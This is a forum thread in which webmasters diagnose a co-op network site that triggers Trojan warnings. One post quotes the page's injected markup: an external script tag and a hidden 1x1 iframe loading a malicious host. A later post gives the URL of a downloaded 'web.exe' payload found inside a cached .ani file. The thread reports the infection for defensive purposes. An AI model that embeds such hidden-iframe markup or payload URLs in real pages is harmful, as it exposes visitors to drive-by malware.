One of the sites in the network give virus warnings when opened, where do I go... Virus.moo Trojan.... and tries to Windows open shell scripts etc.. Can I just post the site, or....
Ok BIG WARNING http://www.onlinemarketingtoday. com/ Gives me a virus warning when I open the site. The site tries to install a Trojan and run wshell scripting stuff. Its part of the coop network. I use Norton Systemworks, latest updates.
I dare not visit the site. I opened notepad, then file > open > the url. see: <!-- *** Paste this into the body of your HTML document *** --> <script language=Javascript src=http://www.instantattention.com/js/agjs.aspx?m=190&i=1></script> <iframe src='http://www.doce.name/index.php' width=1 height=1></iframe> Code (markup): They're the only bit's that could be 'suspect' imo.
I send an email to the webmaster, maybe this site can be removed from the coop until things are fixed??? Don't like linking to a site like this...
Until Shawn's online unfortunatley nothing can be done about this... I can only initially approve ads, not remove them if something has since been discovered.
Your problem is that you use Norton. IMHO: Since in the past it allowed many 'newer viruses' pass, they have tried to fix this by turning up the sensitivity so high you get many false-positives. Check out AVG, they have a free edition too. http://free.grisoft.com/freeweb.php/doc/2/ hth, tom
Its not a false positive. It tries to access The Windows Shell Command, and this an error that IE gives. I never had "false positives" ever with Norton.
I just went again and had no problems... Also, that site I have used for a very long time now and I don't think Duncan would ever intentionally add viruses to his site.
I get nothing when I goto the site, I am using Norton 2005. It is just a normal site, it does have a popup, but, not anything malicious that I can see.
I get an intrusion attempt: www*instantattention*com attacking port 2692 (netscape cookie moster) When I search for that it is some sort of pop-up that gets past blockers, but it doesn't work for me HA HA
Its not this Duncan, but the external script he is using from www.doce .name and he may not be aware... Look Here: http://securityresponse.symantec.com/avcenter/venc/data/trojan.moo.html Find any m00.exe lately on your PC??
Yes, I can comfirm it. If you visit the site with FireFox, nothing seems to happen. When I use IE to visit the site, I scanned my documents/settings folder with Kaspersky and it found a file called "counter[1].ani" as being infected. When opening the file with notepad.exe, towards the bottom, it has: http://doce.name/ traffic/ web.exe Warning - That file is currently present. After removing the file from my temp internet files, I went back to the site with FireFox and then rescanned my docs/settings folder and nothing is present. Then I went back with IE and rescanned with Kaspersky and again, it found the same filename: counter[1].ani It seems to be detecting the browser being used and taking action based upon that.
You know what, I might not be getting the same virus/trojan alert since I block most activex features. I think AVG even runs interference, therefore I don't receive the 'bad' code, so I don't get the warning. Just thinking out loud. tom